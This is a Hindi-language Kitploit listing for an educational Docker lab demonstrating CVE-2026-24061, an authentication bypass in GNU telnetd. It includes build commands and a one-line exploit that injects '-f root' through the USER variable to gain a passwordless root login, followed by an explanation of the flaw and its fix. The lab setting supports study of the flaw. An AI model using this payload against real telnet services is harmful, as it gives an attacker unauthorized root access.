Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/gabs-hub/cve-2026-24061_lab
भेद्यता विश्लेषणशोषणप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

# CVE-2026-24061 के लिए शैक्षिक Docker लैब GNU telnetd में प्रमाणीकरण बायपास का प्रदर्शन करने वाला शैक्षिक Docker लैब, जो USER पर्यावरण चर में तर्क इंजेक्शन के माध्यम से रूट एक्सेस की अनुमति देता है।

रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061 Telnetd लैब

इस रिपॉजिटरी में CVE-2026-24061 भेद्यता को प्रदर्शित करने के लिए एक सरल Docker लैब शामिल है। यह लिनक्स पर GNU telnetd में प्रमाणीकरण बायपास और root के रूप में पहुंच की अनुमति देता है।

इसका उद्देश्य पूर्णतः शैक्षिक है।

आवश्यकताएँ

  • Docker स्थापित
  • Telnet क्लाइंट स्थापित

इमेज का बिल्ड

root@kitploit:~
docker build -t cve-2026-24061 .

कंटेनर का निष्पादन

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

शोषण

दूसरे टर्मिनल में, निम्नलिखित चलाएँ:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

इसके बाद, पासवर्ड मांगे बिना सीधे root के रूप में पहुंच प्रदान की जाएगी।

टिप्पणियाँ

  • कंटेनर GNU inetutils telnetd का एक भेद्य संस्करण उपयोग करता है
  • Telnet सेवा को वास्तविक वातावरण में उजागर नहीं किया जाना चाहिए
  • इस लैब का उपयोग केवल अध्ययन और प्रदर्शन के लिए करें

भेद्यता कैसे काम करती है?

यह दोष /usr/bin/login उपयोगिता के आह्वान के दौरान तर्क इंजेक्शन के कारण उत्पन्न होता है। telnetd लॉगिन को कॉल करने के लिए उपयोग की जाने वाली कमांड लाइन को गतिशील रूप से बनाता है और प्लेसहोल्डर %U के माध्यम से USER पर्यावरण चर का मान शामिल करता है, बिना किसी सैनिटाइज़ेशन के।

चूंकि लॉगिन उपयोगिता -f विकल्प स्वीकार करती है, जो पासवर्ड प्रमाणीकरण को अनदेखा करता है, एक हमलावर USER="-f root" सेट कर सकता है और सीधे root के रूप में लॉगिन को बाध्य कर सकता है।

चूंकि telnetd उच्च विशेषाधिकारों के साथ चलता है, यह हेरफेर तुरंत वैध क्रेडेंशियल्स की आवश्यकता के बिना root शेल में परिणत होता है। शोषण सरल है, पूर्व इंटरैक्शन की आवश्यकता नहीं है, और इसे आसानी से स्वचालित किया जा सकता है, जो CVSS 9.8 स्कोर को उचित ठहराता है।

USER चर के सत्यापन और सैनिटाइज़ेशन की शुरुआत के साथ भेद्यता को ठीक किया गया था, जो हाइफ़न से शुरू होने वाले मानों और विशेष वर्णों को अवरुद्ध करता है, जिससे लॉगिन में तर्क इंजेक्शन रोका जा सके।

टूल डाउनलोड करें